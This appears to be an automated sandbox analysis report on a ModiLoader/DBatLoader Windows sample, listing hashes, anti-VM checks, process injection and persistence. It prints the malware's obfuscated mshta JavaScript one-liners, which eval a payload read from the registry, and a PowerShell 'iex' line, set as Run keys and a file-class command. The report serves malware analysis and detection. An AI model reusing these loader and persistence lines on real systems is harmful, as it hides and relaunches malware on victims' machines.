Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
04-05-2024 08:26
Static task
static1
Behavioral task
behavioral1
Sample
11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe
Resource
win10v2004-20240426-en
General
-
Target
11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe
-
Size
265KB
-
MD5
11e27faa8cf80aa4d6b08e31845211ff
-
SHA1
8e2706830d2f3d04f66746a342a5920a1ca04d76
-
SHA256
a49fa2fd171c274cfcdf1275eeee73052ac43e233951fdd84a1e2f9a8db57614
-
SHA512
c026e87bb28c505a37f41614f2d03690d3b7ff7c986483bb4f4aafe75cd9d466f4759080eebe4006fe6d6424b6fb2214c2a70c48f86b43f6f3f1263cfae8614e
-
SSDEEP
6144:veX94nYY+uUMFemOFu3Ksm2Yn+EE9j+ivEyPYxJQeH:OSnYPweZnl+EER+iv6IeH
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2544 2660 mshta.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions regsvr32.exe -
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc process File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys regsvr32.exe -
ModiLoader Second Stage 59 IoCs
Processes:
resource yara_rule behavioral1/memory/2820-2-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2820-4-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2820-5-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2820-6-0x0000000001C80000-0x0000000001D56000-memory.dmp modiloader_stage2 behavioral1/memory/2820-7-0x0000000001C80000-0x0000000001D56000-memory.dmp modiloader_stage2 behavioral1/memory/2820-9-0x0000000001C80000-0x0000000001D56000-memory.dmp modiloader_stage2 behavioral1/memory/2820-10-0x0000000001C80000-0x0000000001D56000-memory.dmp modiloader_stage2 behavioral1/memory/2820-8-0x0000000001C80000-0x0000000001D56000-memory.dmp modiloader_stage2 behavioral1/memory/2820-11-0x0000000001C80000-0x0000000001D56000-memory.dmp modiloader_stage2 behavioral1/memory/2820-12-0x0000000001C80000-0x0000000001D56000-memory.dmp modiloader_stage2 behavioral1/memory/1972-21-0x0000000006160000-0x0000000006236000-memory.dmp modiloader_stage2 behavioral1/memory/2156-23-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-25-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-27-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/1972-26-0x0000000006160000-0x0000000006236000-memory.dmp modiloader_stage2 behavioral1/memory/2156-28-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-29-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-39-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-46-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-47-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-48-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-45-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-58-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-49-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-59-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-57-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-56-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-55-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-54-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-44-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-43-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-42-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-41-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-40-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-66-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-38-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-37-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-36-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-35-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-34-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-33-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-32-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-31-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/2156-30-0x00000000001D0000-0x0000000000311000-memory.dmp modiloader_stage2 behavioral1/memory/1176-79-0x00000000002D0000-0x0000000000411000-memory.dmp modiloader_stage2 behavioral1/memory/1176-81-0x00000000002D0000-0x0000000000411000-memory.dmp modiloader_stage2 behavioral1/memory/1176-78-0x00000000002D0000-0x0000000000411000-memory.dmp modiloader_stage2 behavioral1/memory/1176-77-0x00000000002D0000-0x0000000000411000-memory.dmp modiloader_stage2 behavioral1/memory/1176-76-0x00000000002D0000-0x0000000000411000-memory.dmp modiloader_stage2 behavioral1/memory/1176-75-0x00000000002D0000-0x0000000000411000-memory.dmp modiloader_stage2 behavioral1/memory/1176-74-0x00000000002D0000-0x0000000000411000-memory.dmp modiloader_stage2 behavioral1/memory/1176-73-0x00000000002D0000-0x0000000000411000-memory.dmp modiloader_stage2 behavioral1/memory/1176-72-0x00000000002D0000-0x0000000000411000-memory.dmp modiloader_stage2 behavioral1/memory/1176-71-0x00000000002D0000-0x0000000000411000-memory.dmp modiloader_stage2 behavioral1/memory/1176-70-0x00000000002D0000-0x0000000000411000-memory.dmp modiloader_stage2 behavioral1/memory/1176-69-0x00000000002D0000-0x0000000000411000-memory.dmp modiloader_stage2 behavioral1/memory/1176-68-0x00000000002D0000-0x0000000000411000-memory.dmp modiloader_stage2 behavioral1/memory/1176-80-0x00000000002D0000-0x0000000000411000-memory.dmp modiloader_stage2 behavioral1/memory/1176-67-0x00000000002D0000-0x0000000000411000-memory.dmp modiloader_stage2 -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools regsvr32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
regsvr32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion regsvr32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion regsvr32.exe -
Deletes itself 1 IoCs
Processes:
regsvr32.exepid process 2156 regsvr32.exe -
Drops startup file 1 IoCs
Processes:
regsvr32.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e795bdc5.lnk regsvr32.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
regsvr32.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:m2YOT9=\"6MxzCm\";n0G5=new%20ActiveXObject(\"WScript.Shell\");OkZ8Y=\"Z5Z\";Qu1Ik=n0G5.RegRead(\"HKCU\\\\software\\\\pzadcohmp\\\\jhpvhyp\");aNMF2bTq2=\"y\";eval(Qu1Ik);tmut1Xaj=\"SiO5WEU\";" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\d3afae00\\9a86c6c3.lnk\"" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:G9Br0i=\"VIusK1uO\";F6y=new%20ActiveXObject(\"WScript.Shell\");tgum6P=\"HX4e\";l9dPD6=F6y.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\pzadcohmp\\\\jhpvhyp\");dupP8Nt=\"nLqzIpB\";eval(l9dPD6);CkgW8RpW2=\"7GO\";" regsvr32.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
regsvr32.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum regsvr32.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exepowershell.exeregsvr32.exedescription pid process target process PID 2856 set thread context of 2820 2856 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe PID 1972 set thread context of 2156 1972 powershell.exe regsvr32.exe PID 2156 set thread context of 1176 2156 regsvr32.exe regsvr32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
regsvr32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\International regsvr32.exe -
Modifies registry class 7 IoCs
Processes:
regsvr32.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:hu8OzfW=\"vTo\";jY2=new ActiveXObject(\"WScript.Shell\");ji5b3oq=\"p\";TTJ5h8=jY2.RegRead(\"HKCU\\\\software\\\\pzadcohmp\\\\jhpvhyp\");WOL56vAaB=\"dQw\";eval(TTJ5h8);hsL24fs=\"NF\";\"" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\.73caeeca8 regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\.73caeeca8\ = "379d11eb" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb\shell regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb\shell\open regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb\shell\open\command regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeregsvr32.exepid process 1972 powershell.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe 2156 regsvr32.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
powershell.exeregsvr32.exepid process 1972 powershell.exe 2156 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1972 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exepid process 2856 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 31 IoCs
Processes:
11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exemshta.exepowershell.exeregsvr32.exedescription pid process target process PID 2856 wrote to memory of 2820 2856 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe PID 2856 wrote to memory of 2820 2856 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe PID 2856 wrote to memory of 2820 2856 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe PID 2856 wrote to memory of 2820 2856 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe PID 2856 wrote to memory of 2820 2856 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe PID 2856 wrote to memory of 2820 2856 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe PID 2856 wrote to memory of 2820 2856 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe PID 2856 wrote to memory of 2820 2856 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe PID 2856 wrote to memory of 2820 2856 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe PID 2856 wrote to memory of 2820 2856 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe PID 2856 wrote to memory of 2820 2856 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe PID 2544 wrote to memory of 1972 2544 mshta.exe powershell.exe PID 2544 wrote to memory of 1972 2544 mshta.exe powershell.exe PID 2544 wrote to memory of 1972 2544 mshta.exe powershell.exe PID 2544 wrote to memory of 1972 2544 mshta.exe powershell.exe PID 1972 wrote to memory of 2156 1972 powershell.exe regsvr32.exe PID 1972 wrote to memory of 2156 1972 powershell.exe regsvr32.exe PID 1972 wrote to memory of 2156 1972 powershell.exe regsvr32.exe PID 1972 wrote to memory of 2156 1972 powershell.exe regsvr32.exe PID 1972 wrote to memory of 2156 1972 powershell.exe regsvr32.exe PID 1972 wrote to memory of 2156 1972 powershell.exe regsvr32.exe PID 1972 wrote to memory of 2156 1972 powershell.exe regsvr32.exe PID 1972 wrote to memory of 2156 1972 powershell.exe regsvr32.exe PID 2156 wrote to memory of 1176 2156 regsvr32.exe regsvr32.exe PID 2156 wrote to memory of 1176 2156 regsvr32.exe regsvr32.exe PID 2156 wrote to memory of 1176 2156 regsvr32.exe regsvr32.exe PID 2156 wrote to memory of 1176 2156 regsvr32.exe regsvr32.exe PID 2156 wrote to memory of 1176 2156 regsvr32.exe regsvr32.exe PID 2156 wrote to memory of 1176 2156 regsvr32.exe regsvr32.exe PID 2156 wrote to memory of 1176 2156 regsvr32.exe regsvr32.exe PID 2156 wrote to memory of 1176 2156 regsvr32.exe regsvr32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Users\Admin\AppData\Local\Temp\11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe"2⤵PID:2820
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:fTMkICz02="KJH";q2Z2=new%20ActiveXObject("WScript.Shell");iQ52hSU="eO";UuY82n=q2Z2.RegRead("HKLM\\software\\Wow6432Node\\0HNGvqG\\uRVsRh");Kf1gAyM="M3Bs1gPW";eval(UuY82n);N4DE8v="C";1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:gqsp2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Drops startup file
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵PID:1176
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
25KB
MD51c22f4412dd3f7741dae7b79ae8895d2
SHA1e4dc8792c2e2d61260f36483de74a36f6560b669
SHA256237194b26426c690be3a630dfcfd81cd53a41630a131308e748b47674e1e403d
SHA512dda72964884e71f251753046b5c67764a7cb6fbd3f5a344316e4030203e9d1c84a2dc3bb5fb251663d884106e9ff1505c7f3b1f1a1d4bee4f5f8f0a262fe4a1c
-
Filesize
897B
MD5b5a308dbaa0f4ae2ba712c72979b0e4f
SHA1ea6270ac97809e3388adb25eca2b7a0f68ad8c55
SHA25607df68df30334d44408ad1fa3e94d759270bdc1b17a9b494aa59dd43605e9482
SHA5123e3ff80778838b0078b8dc4bc7fb60b6d1cf374f8cda491b2d32805650d5c1a61f026bad431f326d116b73cc2c5fce36871811a5e9cedcabf3c0d5305b7f612d
-
Filesize
67B
MD5f2ae417dcfcbe11a00d1102e6b587247
SHA10078bd4798af0b8a717425f1a85a1ff2a70c4c37
SHA2560dc66bcd192c0da909958e43407fb9c4eb212c0471e715e32555f9399549255b
SHA5128fd8d7af58ce744f505ec537830104bab71f86e87f7184bb6f0b699c8eed5f68ffd97211c435771b76aae94c8a74f782b656923c0f61f7189349b744d76f7dea
-
Filesize
999B
MD5d6891377644b9dade40d05709cfffd78
SHA1ce2ea83ec89887753e40da3a5bede59b16f7b747
SHA2564e5f6bc7bd7163394d29bd76b1b2656cfa8372c53a1d9a58ccf39f419e50e601
SHA5129510eefa9b344e2538c62688c9b866f5b617934408d8395450edec71b00ac7be09f817ad7d7f61d23c1912cca01e0d1dae3a139bdfe1755f4149e01bbf76ccd7
-
Filesize
41KB
MD5281f7199a0402dbe5e6c7a1bfe6c6c52
SHA1a75cb62a9e7d66852f2ff727700f712324616c87
SHA2564414d7e248aaeefe3a00e0e3d585e78ff8509391b1448b913d6a27a8d601e502
SHA5124fa8f59d085d12bf24e26ba44df90b2993269ef1a8a600c6a0c383552a0590592f78d59c370628c84eae1db2595e4b25776a9385309a0d80b4b404be9bf9d7f1